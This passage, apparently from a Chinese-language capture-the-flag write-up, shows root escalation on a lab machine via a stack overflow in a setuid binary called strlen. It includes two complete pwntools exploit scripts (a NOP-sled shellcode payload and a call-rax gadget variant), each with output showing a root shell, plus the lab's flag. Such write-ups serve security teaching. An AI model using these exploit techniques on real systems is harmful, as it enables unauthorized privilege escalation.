0x7fffffffe7a0: 0x90909090      0x90909090
gdb-peda$ q

随便使用一个含有\x90的地址，设为rip跳转的地址

我这里用0x7fffffffe750

由于rip含有\x00(空字节)无法避免，所以通过标准输出直接传参给strlen

Python3中需要将字符串转换为字节，并且使用正确的转义序列

import sys; sys.stdout.buffer.write(b"nop_padding" + b"shellcode"+b"rip")

最终payload如下

from pwn import *
import sys

context(arch='amd64', os='linux', log_level='info')

# 1. 生成 Shellcode
shellcode = asm(shellcraft.sh())        

# 2. 计算 Padding 长度
offset = 264
nop_padding = b'\x90' * (offset - len(shellcode))

# 3. 获取 Shellcode 地址（需动态泄漏或已知固定地址）
rip = 0x7fffffffe750        

# 4. 构造 Payload
payload = flat(
    nop_padding,
    shellcode,
    p64(rip)                # 覆盖 rip 为 shellcode 地址
)

# 发送 Payload
#io = process(["/opt/projects/strlen", payload])
#io.interactive()
# 输出到标准输出（二进制模式）
sys.stdout.buffer.write(payload)

靶机内已经装了pwntools

尝试执行一下

gato@hell:/tmp$ /opt/projects/strlen $(python3 a.py)
bash: warning: command substitution: ignored null byte in input

█▀ ▀█▀ █▀█ █   █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: jhH/bin///sPHhri4$1V^HVH1j;XP

[+] Length: 270

# id
uid=0(root) gid=1000(gato) groups=1000(gato)
# cat /root/*
cat: /root/containers: Is a directory

█▀█ █▀█ █▀█ ▀█▀   █ █ █▀▀ █   █
█▀▄ █▄█ █▄█  █    █▀█ ██▄ █▄▄ █▄▄

Flag 11: HELL{0V3RF10W_F0R_B3G1NN3R5}

Congratulations on completing this CTF!


- Do you want to tell me what you thought or if you would add/change anything?
- Do you want to support me by following me on the networks?
- Have you found any unexpected route?

Contact me through the following links:

Github:    https://github.com/GatoGamer1155
Twitter:   https://twitter.com/GatoGamer1155
YouTube:   https://www.youtube.com/@GatoGamer1155
Discord:   https://discord.com/users/866396648691597374
Instagram: https://www.instagram.com/GatoGamer1155

策略二

ROP链为**shellcode + padding + call_rax**

利用ROPgadget查找call_rax

1 2	❯ ROPgadget --binary strlen \| grep ": call rax" 0x0000000000401014 : call rax

利用pwntools编写脚本

from pwn import *

# ------------------ 配置 ------------------
context(arch='amd64', os='linux', log_level='info')

offset = 264

# ------------------ 生成无空字节 Shellcode ------------------
shellcode = asm(shellcraft.sh())

# ------------------ 构造 Payload ---------------------------
# 计算填充长度（确保覆盖到返回地址）
padding_length = offset - len(shellcode)

payload = flat(
    shellcode,
    b'A' * padding_length,
    b'\x14\x10\x40'  # call_rax地址不含空字节
)

# ------------------ 执行 -----------------------------
io = process(["/opt/projects/strlen", payload])
io.interactive()

直接执行即可

gato@hell:/tmp$ python3 exp.py
[+] Starting local process '/opt/projects/strlen': pid 1453
[*] Switching to interactive mode

█▀ ▀█▀ █▀█ █   █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: jhH\xb8/bin///sPH\x89\xe7hri\x814$1\xf6V^H\xe6VH\x89\xe61\xd2j;X\x0fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x14@

[+] Length: 267

$ id
uid=0(root) gid=1000(gato) groups=1000(gato)
$ cat /root/*
cat: /root/containers: Is a directory

█▀█ █▀█ █▀█ ▀█▀   █ █ █▀▀ █   █
█▀▄ █▄█ █▄█  █    █▀█ ██▄ █▄▄ █▄▄

Flag 11: HELL{0V3RF10W_F0R_B3G1NN3R5}

Congratulations on completing this CTF!


- Do you want to tell me what you thought or if you would add/change anything?
- Do you want to support me by following me on the networks?
- Have you found any unexpected route?

Contact me through the following links:

Github:    https://github.com/GatoGamer1155
Twitter:   https://twitter.com/GatoGamer1155
YouTube:   https://www.youtube.com/@GatoGamer1155
Discord:   https://discord.com/users/866396648691597374
Instagram: https://www.instagram.com/GatoGamer1155